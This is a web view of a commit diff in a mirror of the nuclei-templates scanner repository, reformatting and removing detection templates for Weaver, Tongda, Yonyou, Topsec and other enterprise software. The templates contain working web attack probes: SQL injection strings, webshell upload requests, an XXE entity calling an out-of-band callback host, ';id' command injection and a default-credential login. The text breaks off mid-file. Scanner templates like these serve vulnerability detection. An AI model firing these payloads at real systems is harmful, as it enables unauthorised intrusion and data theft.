daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated templates

patch-1
Prince Chaddha 2023-09-17 21:41:07 +05:30
parent 274c14e763
commit b96825a291
35 changed files with 94 additions and 267 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
http/cnvd/2021/CNVD-2021-30167.yaml.yaml
View File

@ -1,79 +0,0 @@
id: yonyou-nc-bshservlet-full-check
info:
name: yonyou-nc-bshservlet-full-check
author: SleepingBag945
severity: critical
description: 测试所有BshServlet RCE端点
reference:
- https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt
tags: yonyou,nc
http:
- method: GET
path:
- "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet"
- "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200

4
http/cnvd/2022/CNVD-2022-43245.yaml
View File

@ -28,12 +28,12 @@ http:
matchers:
- type: word
part: body
words :
words:
- "<methodResponse><params><param><value><base64>"
- type: word
part: header
words :
words:
- "text/xml"
- type: status

2
http/cnvd/2023/CNVD-C-2023-76801.yaml
View File

@ -17,7 +17,7 @@ http:
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
"parameterTypes":["java.lang.Object","java.lang.String"],
"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
- |
GET /{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}

11
http/default-logins/tp-link/tp-link-tl-r470gp-ac-default-login.yaml → http/default-logins/tp-link/tplink-r470gp-default-login.yaml
View File

@ -1,14 +1,14 @@
id: tp-link-tl-r470gp-ac-default-login
info:
name: TP-LINK TL-R470GP-AC Default weak password
name: TP-LINK TL-R470GP-AC - Default Login
author: SleepingBag945
severity: high
description: |
TP-LINK TL-R470GP-AC 默认口令123456
metadata:
fofa-query: title="TL-R470GP-AC"
tags: tp-link,default-login,ac
tags: tp-link,default-login,router
http:
- raw:
@ -17,18 +17,13 @@ http:
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
{"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"stok\""
- "\"error_code\":0"
condition: and
condition: and

34
http/vulnerabilities/other/consul-rexec-rce.yaml
View File

@ -1,34 +0,0 @@
id: consul-rexec-rce
info:
name: Consul Rexec RCE
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- '"EnableRemoteScriptChecks":true'
condition: and
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec

35
http/vulnerabilities/other/consul-service-rce.yaml
View File

@ -1,35 +0,0 @@
id: consul-service-rce
info:
name: consul-service-rce
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "\"EnableScriptChecks\": true"
- "\"EnableRemoteScriptChecks\": true"
condition: or
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec

2
http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
View File

@ -2,7 +2,7 @@ id: secsslvpn-auth-bypass
info:
name: Secure Access Gateway SecSSLVPN - Authentication Bypass
author: SleepingBag945
author: SleepingBag945
severity: high
description: |
The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.

3
http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
View File

@ -1,5 +1,4 @@
id: ruijie-nbr-fileupload
info:
name: Ruijie NBR fileupload.php - Arbitrary File Upload
author: SleepingBag945
@ -28,7 +27,7 @@ http:
Content-Type: image/jpeg
<?php echo "{{string}}"; unlink(__FILE__); ?>
- |
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
Host: {{Hostname}}

2
http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
View File

@ -57,7 +57,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- status_code_2 == 200
- contains(body_2,'{{file-upload}}')
- contains(header_2,'text/html')

4
http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
View File

@ -27,11 +27,11 @@ http:
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls"
Content-Type: application/vnd.ms-excel
<% out.println("{{string}}");%>
--59229605f98b8cf290a7b8908b34616b--

2
http/vulnerabilities/smartbi/smartbi-deserialization.yaml
View File

@ -1,7 +1,7 @@
id: smartbi-deserialization
info:
name: Smartbi windowunloading Interface - Deserialization
name: Smartbi windowunloading Interface - Deserialization
author: SleepingBag945
severity: high
description: |

3
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
View File

@ -13,7 +13,7 @@ info:
max-request: 1
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,fileupload,intrusive
tags: tongda,fileupload,intrusive,router
variables:
num: "999999999"
@ -59,6 +59,7 @@ http:
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(num)}}'

17
http/vulnerabilities/tongda/tongda-insert-sqli.yaml
View File

@ -23,15 +23,24 @@ http:
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
- |
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
part: header_1
words:
- "PHPSESSID="
- "register_for/?rid="
condition: and
- type: status
status:
- 302
- type: word
part: header_2
words:
- "register_for/?rid="
negative: true

36
http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
View File

@ -1,36 +0,0 @@
id: topsec-topapplb-arbitrary-login
info:
name: Topsec TopAppLB Any account Login - Arbitrary Login
author: SleepingBag945
severity: high
description: |
Any Account can log in to the background.Enter any account on the login page, the password is ;id
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
max-request: 1
fofa-query: title="TopApp-LB 负载均衡系统"
tags: topsec,topapplb,misconfig
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
userName=admin&password=%3Bid
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
condition: and

4
http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
View File

@ -7,7 +7,7 @@ info:
description: |
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
max-request: 1
verified: true
@ -24,7 +24,7 @@ http:
userName=admin&password=%3Bid
- |
GET / HTTP/1.1
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true

2
http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml
View File

@ -23,7 +23,7 @@ http:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
<value>&xxe;</value>
matchers-condition: and

15
http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml → http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
View File

@ -1,15 +1,15 @@
id: weaver-e-cology-verifyquicklogin-arbitrary-login
id: ecology-verifyquicklogin-auth-bypass
info:
name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
author: SleepingBag945
severity: high
description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞攻击者通过发送特殊的请求包可以获取管理员Session
description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa
tags: ecology,weaver,oa,auth-bypass
http:
- raw:
@ -23,19 +23,18 @@ http:
identifier=1&language=1&ipaddress=x.x.x.x
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"sessionkey\":"
- type: word
part: body
words:
- "\"message\":"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
- 200

26
http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
View File

@ -1,34 +1,34 @@
id: weaver-e-cology-validate-sqli
info:
name: weaver-e-cology-validate-sqli
name: Weaver e-cology Validate.JSP - SQL Injection
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的validate.jsp文件中因为对参数capitalid过滤不严可致使SQL注入漏洞。攻击者运用该漏洞可在未授权的情况下远程发送精心构造的SQL语句从而取得数据库敏感信息。
tags: ecology,weaver,oa,sqli
description: |
In the validate.jsp file of the Panwei e-cology OA system, the parameter capitalid is not strictly filtered, which can lead to SQL injection vulnerabilities. An attacker can use this vulnerability to remotely send carefully constructed SQL statements without authorization, thereby obtaining sensitive database information.
tags: ecology,weaver,sqli
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{num1}}*{{num2}})&capitalnum=-10
matchers-condition: and
matchers:
- type: word
part: body
words:
- "8370114"
- "{{result}}"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
- 200

10
http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
View File

@ -39,7 +39,15 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- status_code == 200
- contains(body,'Windows IP Configuration')
condition: and
- type: word
part: header
words:
- "application/json"
- "text/html"
negative: true
condition: and

2
http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
View File

@ -35,7 +35,7 @@ http:
skip-variables-check: true
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
- "status_code_2 == 200 && contains(header_2, 'filename=')"
- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"

4
http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
View File

@ -21,8 +21,8 @@ variables:
http:
- method: GET
path:
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
# - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
stop-at-first-match: true
matchers:

6
http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
View File

@ -17,7 +17,7 @@ info:
variables:
filename: "{{to_lower(rand_base(5))}}"
payload: "[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
http:
- raw:
@ -35,9 +35,7 @@ http:
- type: word
part: body_2
words:
- "PHP Version"
- "PHP Extension"
condition: and
- "758058d8987e7a9ec723bcdbec6c407e"
- type: status
status:

4
http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
View File

@ -51,7 +51,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "status_code_3 == 200 && contains(body_3,'{{string}}')"
condition: and
condition: and

2
http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
View File

@ -43,7 +43,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and

4
http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
View File

@ -10,7 +10,7 @@ info:
max-request: 1
fofa-query: app="泛微-EOffice"
verified: true
tags: weaver,e-office,oa,instrusive,rce
tags: weaver,e-office,intrusive,rce,file-upload
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -59,7 +59,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"

4
http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
View File

@ -33,7 +33,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
- "status_code_2 == 200 && contains(body_2,'<title>新建')"
condition: and
condition: and

12
http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
View File

@ -1,7 +1,7 @@
id: weaver-office-server-file-upload
info:
name: OA E-Office OfficeServer.php Arbitrary File Upload
name: OA E-Office OfficeServer.php Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="泛微-EOffice"
verified: true
tags: weaver,e-office,oa,rce,intrusive,file-upload
tags: weaver,e-office,oa,rce,intrusive,fileupload
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -31,9 +31,7 @@ http:
Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
<?php echo md5(weaver);?>'
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData"
@ -50,9 +48,7 @@ http:
- type: word
part: body_2
words:
- "PHP Version"
- "PHP Extension"
condition: and
- "758058d8987e7a9ec723bcdbec6c407e"
- type: status
status:

4
http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
View File

@ -24,8 +24,8 @@ http:
- type: word
part: body
words:
- "datapassword"
- "datauser"
- "datapassword ="
- "datauser ="
condition: and
- type: status

2
http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
View File

@ -44,7 +44,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"

6
http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
View File

@ -11,7 +11,7 @@ info:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
tags: ecology,fileupload,intrusive
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -65,12 +65,12 @@ http:
internal: true
group: 1
regex:
- "&fileid=(.*?)\'>"
- "&fileid=(.*?)\\'>"
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
